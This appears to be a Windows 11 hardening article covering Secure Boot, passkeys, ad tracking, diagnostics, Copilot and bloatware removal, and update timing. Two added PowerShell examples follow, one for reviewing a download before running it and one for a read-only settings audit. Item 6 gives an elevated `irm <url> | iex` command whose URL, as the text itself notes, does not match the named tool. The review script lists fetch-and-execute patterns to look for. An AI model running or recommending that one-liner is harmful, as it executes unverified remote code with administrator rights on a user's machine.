Windows 11 Security and Privacy Mistakes Most Users Never Fix
Most people set up Windows 11 once and never look back. That’s a problem. Default settings leave your data exposed, AI features run unchecked, and updates install before they’re stable. Here’s what to fix and how to do it.
Start Here: Security First
1. Secure Boot Is Off and You Don’t Know It
This is the most overlooked security setting on Windows 11. Secure Boot blocks unsigned code from running at startup, which means rootkits and bootkits can’t load before Windows does. Many systems still ship with it disabled.
Check your status first:
Press Win + R, type msinfo32, hit Enter. Look for Secure Boot State under System Summary. It should say On.
If it’s off:
- Restart your PC and enter UEFI/BIOS firmware settings
- Navigate to the Security or Boot tab
- Enable Secure Boot and save changes
Windows 11 builds 22H2 and later automatically install updated security certificates. Secure Boot must be active for those certificates to work correctly, so this isn’t optional on modern hardware.
2. You’re Using Passwords Instead of Passkeys
Passwords are still the default, but they’re the weakest link in your account security. Passkeys are phishing-resistant, don’t require remembering anything, and are now built directly into Windows 11.
When you sign in to a supported site or app, Windows will offer to save a passkey. No third-party app needed.
Manage saved passkeys: Settings > Accounts > Passkeys
For your Windows sign-in, replace your password with Windows Hello: Settings > Accounts > Sign-in options
Set up a PIN, fingerprint, or facial recognition. Even a PIN is significantly more secure than a traditional password since it’s tied to your device and never transmitted over a network.
3. Your Microsoft Account Is Doing Too Much
Signing in with a Microsoft account syncs settings, credentials, and activity across all your devices. If you only use one PC and don’t need that sync, you’re giving Microsoft more access than necessary.
Switch to a local account: Settings > Accounts > Your info > Sign in with a local account instead
You won’t lose access to Microsoft 365, Outlook, or OneDrive; you’ll just sign into each app separately. Local accounts also reduce the attack surface if your Microsoft credentials are ever compromised.
Privacy Settings Microsoft Quietly Enables
4. Your Advertising ID Is Turned On
Windows 11 assigns every user an advertising ID and uses it to track app activity across the system. It feeds personalised ads inside Windows itself, not just in the browser.
Turn it off: Settings > Privacy & security > General
Disable:
- Let apps show me personalised ads using my advertising ID
- Let Windows improve Start and search results
- Show me suggested content in the Settings app
Then go one level deeper: Settings > Privacy & security > Recommendations & offers
Turn off Personalised ads here as well. Microsoft tucks this option separately from the main toggle, and most people miss it.
5. You’re Sharing Optional Diagnostic Data
During setup, Windows 11 prompts you to choose a diagnostic data level. Most people click through and end up sharing far more than required. Optional diagnostic data includes detailed logs of how you use apps and features, sent directly to Microsoft.
Fix it: Settings > Privacy & security > Diagnostics & feedback
Set the level to Required diagnostic data only. This gives Microsoft the minimum needed to keep Windows functional, nothing more.
Apps and Bloat You Don’t Need
6. Copilot Is Running in the Background
Microsoft has embedded Copilot and AI features across Windows 11: inside Notepad, Paint, Snipping Tool, and the taskbar. Even if you never open them, several components run background processes.
Manual removal: Settings > Apps > Installed apps > search for Copilot > Uninstall
For deeper removal, open Group Policy Editor: gpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Windows Copilot, set to Disabled
Fastest method, using the RemoveWindowsAI script:
```powershell
# Run in elevated PowerShell
irm https://github.com/lakent/fnsync | iex
```
This handles Copilot policies and AI component removal in one pass.
Some AI features embedded in apps like Notepad and Paint can only be disabled, not fully removed, without a script.
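Piping a download straight into iex runs whatever the URL serves at that moment, with administrator rights, and the address in the one-liner above does not contain the name RemoveWindowsAI, so confirm the source first. The following is an added example, not code from the article's author or from the RemoveWindowsAI project: it saves the script, lists the lines worth reading first, and runs only the reviewed file. `$ScriptUrl` and the output file name are placeholders.

```powershell
# Added example: download, inspect, then run, instead of irm | iex.
# $ScriptUrl is a placeholder; it is not the project's real address.
$ErrorActionPreference = 'Stop'
$ScriptUrl = 'https://example.invalid/path/to/script.ps1'
$OutFile   = Join-Path $env:TEMP 'script-under-review.ps1'

# 1. Save the script to disk. Nothing executes at this point.
Invoke-WebRequest -Uri $ScriptUrl -OutFile $OutFile -UseBasicParsing

# 2. Record the SHA-256 so the file that is reviewed is the file that runs.
$reviewed = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
Write-Host "Saved to $OutFile"
Write-Host "SHA256   $reviewed"

# 3. List lines that download or execute further code; read these first.
$risky = 'Invoke-Expression', '\biex\b', 'Invoke-WebRequest', '\birm\b',
         'Invoke-RestMethod', 'DownloadString', 'FromBase64String',
         '-EncodedCommand', 'Start-Process'
Select-String -Path $OutFile -Pattern $risky |
    Select-Object LineNumber, Line |
    Format-Table -Wrap

# 4. Open the whole script for reading before deciding anything.
notepad.exe $OutFile

# 5. Run only on explicit confirmation, and only if the file is unchanged
#    since it was hashed in step 2.
$answer  = Read-Host 'Type RUN to execute the reviewed file'
$current = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
if ($answer -ceq 'RUN' -and $current -eq $reviewed) {
    # Process scope: the policy change ends with this PowerShell session.
    Set-ExecutionPolicy -Scope Process -ExecutionPolicy RemoteSigned -Force
    & $OutFile
} else {
    Write-Host 'Not executed.'
}
```

If the project publishes a checksum or signed release, compare it with the SHA-256 printed in step 2 before typing RUN.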
7. You Still Have Bloatware Installed
Windows 11 ships with pre-installed apps that most users never open. Many of them run background processes, phone home, or just take up space: Xbox Game Bar, Tips, Mail, and various Store apps among them.
Manual approach: Settings > Apps > Installed apps
Sort by publisher or name, identify what you don’t use, and uninstall in bulk.
Faster approach, using Winhance:
Winhance is a free Windows enhancement tool with a dedicated bloatware removal section. It lists everything pre-installed and lets you remove multiple apps at once. Always use the Backup function before making changes.
If removal fails on stubborn apps, boot into Safe Mode with Networking and run Winhance from there.
8. You’re Installing Updates Too Early
Windows 11 delivers feature updates continuously, and they’re available the moment Microsoft releases them. That’s a problem: early builds frequently carry bugs, driver conflicts, and compatibility issues that get patched in the weeks that follow.
Best practice:
Wait at least two to three weeks after a feature update ships before installing it on your main machine. Check known issues before upgrading:
aka.ms/WindowsReleaseHealth
To pause updates temporarily: Settings > Windows Update > Pause updates (up to five weeks)
To block optional and preview builds: Settings > Windows Update > Advanced options > Optional updates
Keep this off unless you’re deliberately testing pre-release builds on a non-production machine.
At a Glance
| Mistake | Fix | Location |
|---|---|---|
| Secure Boot off | Enable in UEFI/BIOS | msinfo32 to verify |
| Using passwords | Switch to passkeys or Windows Hello | Settings > Accounts > Passkeys |
| Microsoft account oversharing | Switch to local account | Settings > Accounts > Your info |
| Advertising ID on | Disable all three ad toggles | Settings > Privacy > General |
| Optional diagnostics on | Set to Required only | Settings > Privacy > Diagnostics |
| Copilot running in background | Remove manually or via script | Settings > Apps |
| Bloatware installed | Use Winhance for bulk removal | Settings > Apps |
| Updating too early | Wait 2–3 weeks, check release health | aka.ms/WindowsReleaseHealth |
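Three rows of the table can be verified from a script instead of by clicking through Settings. This is an added example, not part of the original article: a read-only audit of Secure Boot, the advertising ID and the diagnostic data level. The registry paths and value names are assumptions about where current Windows 11 builds store these toggles; the function names are hypothetical.

```powershell
# Added example: read-only audit of three settings from this article.
# Run from an elevated PowerShell session; nothing is modified.
# Registry locations below are assumptions about current Windows 11 builds.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist.
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

function Get-SecureBootState {
    try {
        if (Confirm-SecureBootUEFI -ErrorAction Stop) { 'On' } else { 'Off' }
    } catch {
        # Raised on legacy-BIOS installs and in non-elevated sessions.
        "Unknown ($($_.Exception.Message))"
    }
}

function Get-AdvertisingIdState {
    $v = Get-RegValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo' 'Enabled'
    if ($null -eq $v) { 'Not set' } elseif ($v -eq 0) { 'Off' } else { 'On' }
}

function Get-DiagnosticDataLevel {
    # A Group Policy value, when present, overrides the Settings toggle.
    $v = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection' 'AllowTelemetry'
    if ($null -eq $v) {
        $v = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection' 'AllowTelemetry'
    }
    # 0 and 1 both mean no optional data is sent; higher values add more.
    if ($null -eq $v) { 'Not set' }
    elseif ($v -le 1) { 'Required only' }
    else { "Optional (value $v)" }
}

@(
    [pscustomobject]@{ Check = 'Secure Boot';     State = Get-SecureBootState;     Expected = 'On' }
    [pscustomobject]@{ Check = 'Advertising ID';  State = Get-AdvertisingIdState;  Expected = 'Off' }
    [pscustomobject]@{ Check = 'Diagnostic data'; State = Get-DiagnosticDataLevel; Expected = 'Required only' }
) | Format-Table -AutoSize
```

The advertising ID is a per-user value, so run the audit once for each account on the machine.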
None of these require advanced skills. Most take under five minutes each. But the difference between default Windows 11 and a properly configured one is significant, especially on privacy and security.
